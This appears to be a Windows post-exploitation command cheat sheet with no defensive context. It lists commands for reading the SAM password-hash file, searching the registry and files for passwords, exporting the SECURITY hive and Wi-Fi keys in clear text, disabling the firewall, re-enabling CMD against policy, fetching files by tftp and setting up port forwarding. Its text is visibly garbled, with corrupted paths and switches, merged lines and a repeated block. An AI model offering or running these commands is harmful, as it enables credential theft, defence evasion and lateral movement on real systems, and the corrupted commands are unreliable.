Callable methods.
wmic [alias] call /?
Process
wmic process list full
Launching WMIC
wmic startupwmic service
Domain information
wmic ntdomain list
List all patches
wmic qfe
Logical partitions
wmic logicaldisk get descriptionname
Query processor data length (32 bit 64 bit)
wmic cpu get DataWidth /format:list
DNS Host
C:\Windows\System32\drivers\etc\hosts
Network Settings
C:\Windows\System32\drivers\etc\networks
Password Hashes of Local Users
C:\Windows\System32\config\SAM
Application Logs
C:\Windows\system32\config\AppEvent.Evt
Security Logs
C:\Windows\System32\config\SecEvent.Evt
Location of Automatic Applications
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\
Operating system version
ver
Services
sc query state=all
Running Process & Services
tasklist /svc
All Process and DLLs
tasklist /m
Remote Process List
tasklist /S ip /v
Forcing the process to close
taskkill /PID pid /F
Remote system information
systeminfo /S ip /U domain\user /P Pwd
Remote registry query
reg query\\ ip \ RegDomain \ Key /v
Searching for passwords in the registry
reg query HKLM /f password /t REG SZ /s
List drivers
fsutil fsinfo drives -
Search All Excel Files
dir /a /s /b c:\'.xls'
Search all patches
dir /a /b c:\windows\kb'
Searching for passwords in files
findstr /si password' .txt I '.xmll '.xls
C: directory listing for directory
tree /F /A c:\ tree.txt
Export the SECURITY hive to a file
reg save HKLl~\Security security.hive
Current user account
echo %USERNAME%
IP information
ipconfig / all
Local DNS cache
ipconfig /displaydns
Open connections
netstat -ana
Netstat loop
netstat -anop tcp 1
Listening ports
netstat -ani findstr LISTENING
Routing table
route print
ARP table
arp -a
DNS Zone
nslookup set type=any ls -d domain
Domain SRV lookup
nslookup -type=SRV _www._tcp.url.com tftp -I ip GET remotefile
Saving the wireless profile
netsh wlan show profiles
Firewall disable
netsh firewall set opmode disable
Extract wifi passwords in clear text
netsh wlan export profile folder=. key=clear
List Interfaces
netsh interface ip show interfaces
Change IP
netsh interface ip set address local static ip nmask gw ID
Change DNS server
netsh interface ip set dns local static ip
Changing the interface with DHCP
netsh interface ip set address local dhcp
Workstation Lockdown
rundll32.dll user32.dll LockWorkstation
Firewall disable
netsh advfirewall set currentprofile state off
Port Forwarding
netsh interface portproxy add v4tov4 listenport=3000 listenaddress=l.l.l.l connectport=4000 connectaddress=2.2.2.2
CMD activation
reg add HKCU\Software\Policies\t1icrosoft\Windows\System /v DisableCMD /t REG DWORD /d 0 /f
List features
wmic [alias] get /?
Callable methods
wmic [alias] call /?
Processes
wmic process list full
Launching WMIC
wmic startupwmic service
Domain information
wmic ntdomain list
Network Settings
C:\Windows\System32\drivers\networks
Password Hashes of Local Users
C:\Windows\System32\config\SAM
Application Logs
C:\Windows\system32\config\AppEvent.Evt
Security Logs
C:\Windows\system32\config\SecEvent.Evt
Logical partitions
wmic logicaldisk get descriptionname
DNS Host
C:\Windows\System32\drivers\etc\hosts
Forward port 80 to local port 4444
fpipe.exe -l 4444 -r 80 x.x.x.x
Listening to port 80 with socat local port 4444
socat TCP4:LISTEN:4444 TCP4:x.x.x.x:80